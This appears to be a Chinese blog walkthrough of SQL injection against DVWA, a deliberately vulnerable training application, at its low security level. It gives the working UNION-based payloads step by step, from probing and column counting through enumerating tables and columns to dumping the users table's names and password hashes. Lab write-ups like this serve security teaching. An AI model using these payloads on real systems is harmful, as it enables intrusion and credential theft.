您的位置:首页 > 数据库

DVWA之low级别SQL Injection

2017-09-14 19:24 429 查看


输入1,返回正常,输入1‘ and ’1‘=’2,返回空,输入1‘ or 1234=1234 #



说明存在字符型注入。

然后猜解字段数,输入1‘ order by 1 #,返回正常,输入1’ order by 2 #,返回正常



输入1‘ order by 3 #,报错,说明只有两个字段,即First name、Surname。

确定显示的字段顺序

输入1′ union select 1,2 #,查询成功:


说明执行的SQL语句为select First name,Surname from 表 where ID=’id’…

获取当前数据库,执行1' union select 1,database() #,返回正常



说明当前数据库为dvwa

获取数据库中的表。1′ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #,查询成功



说明两个表名分别为guestbook,users。

获取字段名,输入1′ union select 1,group_concat(column_name) from information_schema.columns where table_name=’users’ #,查询成功



最后1′ or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #,查询成功

内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: